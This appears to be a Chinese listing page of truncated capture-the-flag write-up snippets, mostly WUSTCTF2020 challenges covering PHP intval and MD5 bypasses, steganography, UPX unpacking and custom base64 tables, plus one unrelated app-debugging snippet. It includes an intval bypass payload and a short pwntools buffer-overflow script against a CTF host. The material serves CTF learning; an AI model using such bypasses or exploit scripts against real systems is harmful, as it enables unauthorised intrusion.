[WUSTCTF2020]alison_likes_jojo

原理intval绕过MD5加密值和原值相等绕过命令执行空格过滤解题过程intval($num)<2020&&intval($num+1)>2021绕过：https://blog.csdn.net/qq_47804678/article/details/128814377参考文章：https://blog.csdn.net/m0_62879498/article/details/124632041......

打开靶机显示  啥都没有，先去查看robots.txt 发现  之后再fake里面请求头中发现fl4g.php  最后绕过三层php限制  第一关intvar 可以解析科学计数法 所以传入 1e4第一个截断解析为1  第二个加一解析为10001 payload：num=1e4第二关只要是0e开头md5......

下载下来一个音频文件一个题目描述使用Audacity打开这段音频Audacity官方下载Audacity是一款易于使用的多轨音频编辑器和记录器，适用于Windows，MacOSX，GNU/Linux和其他操作系统。在CTF比赛中，可以通过对音频进行频谱的分析，以及音频其他内容的分析，找到flag。听起来像是在打电话......

题目地址：https://buuoj.cn/challenges#[WUSTCTF2020]spaceclub一个txt用记事本打开的话，什么都看到确有4kb的大小，联想题目名字spaceclub，使用ctrl+a全选就看清楚了notepad这样全选可能还是不太直观，我这里用sublime打开然后全选一开始以为是摩斯密码，后来发现是每一行的长短对应一个......

查壳：32位，有个小壳，怎么办，脱了呗，还能这么办（方法见前文）https://www.cnblogs.com/TFOREVERY/p/17366210.html脱壳后，进入IDA找主函数：脸上就是flag{Just_upx_-d}收工。......

pwn|wustctf2020_getshellx86ret2textexp:frompwnimport*fromLibcSearcherimport*context.log_level='debug'p=remote('node4.buuoj.cn',28063)p.sendline(b'M'*(0x18+4)+p32(0x0804851B))p.interactive()......

1.64bitnowinexe直接打开2.找到main函数当check（flag）这个函数==1的时候，才正确3.步入：耐心一点，一个一个扣出来就行了。。。a1=[0]*33a1[10]=112a1[13]=6......

1.nowinexe64bit2.打开直接找到main函数是一个base64加密，加密表是：但是解出来是乱码。。然后查了一下（x）谁调用了base64表，发现了这个东西那就是变表了。。写个脚本......

【全埋点引入，却忘关调试】（APP）APP运行一段时间放到后台之后，再进入APP报错：弹出一段英文的tosat提示后又可以正常运行，后面经过几次，这个问题非常疑惑，什么问题都没有，就是弹出来......

题目附件内容：   首先通过观察题目字符特征很明显是base64编码，第一行的密文是通过下面给的base64的变表，但是仔细观察缺少了四个字符，因此我们需要写脚本把缺少的字符......